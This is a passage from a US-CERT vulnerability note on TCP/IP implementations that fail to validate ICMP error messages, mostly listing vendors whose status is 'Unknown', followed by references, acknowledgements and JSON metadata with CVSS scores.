Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SUSE Linux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SecureWorx __ Unknown\n\nNotified: August 12, 2004 Updated: May 03, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Sequent Computer Systems, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Sony Corporation __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### TurboLinux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Unisys __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### ZyXEL __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### eSoft __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\nView all 85 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html>\n * <http://tools.ietf.org/wg/opsec/draft-gont-opsec-icmp-filtering-00.txt>\n * <http://www.ietf.org/rfc/rfc792.txt>\n * <http://www.ietf.org/rfc/rfc1122.txt>\n * <http://www.ietf.org/rfc/rfc1191.txt>\n * <http://www.ietf.org/rfc/rfc1323.txt>\n * <http://www.ietf.org/rfc/rfc2385.txt>\n * <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf>\n * <http://jvn.jp/niscc/532967/index.html>\n * <http://xforce.iss.net/xforce/xfdb/17170>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0065>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0066>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0067>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0068>\n * <http://www.securiteam.com/securitynews/5AP0D2A35U.html>\n * <http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-02.txt>\n * <http://www.ietf.org/ietf/03mar/plpmtud.txt>\n * <http://www.psc.edu/~mathis/MTU/>\n * <http://www.cymru.com/Documents/icmp-messages.html>\n * <http://secunia.com/advisories/14904/>\n * <http://securitytracker.com/alerts/2005/Apr/1013686.html>\n\n### Acknowledgements\n\nInformation about the security risks of ICMP messages has been known for some time (RFC 1191 was published in 1990). More recent work by Fernando Gont (Universidad Tecnol\u00f3gica Nacional - Facultad Regional Haedo) describes different types of ICMP attacks against TCP and proposes a number of defense techniques. Gont's research is documented in an IETF Internet Draft titled \"ICMP attacks against TCP\" (revision 3 as of this writing). Jonathan Looney researched and reported a specific ICMP attack that affects TCP connections on Microsoft Windows systems.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [None](<http://web.nvd.nist.gov/vuln/detail/None>) \n---|--- \n**Severity Metric:** | 12.48 \n**Date Public:** | 2005-04-12 \n**Date First Published:** | 2005-04-12 \n**Date Last Updated: ** | 2008-04-22 22:34 UTC \n**Document Revision: ** | 90 \n", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "cert", "title": "TCP/IP implementations do not adequately validate ICMP error messages", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-04-22T22:34:00", "id": "VU:222750", "href": "https://www.kb.cert.org/vuls/id/222750", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}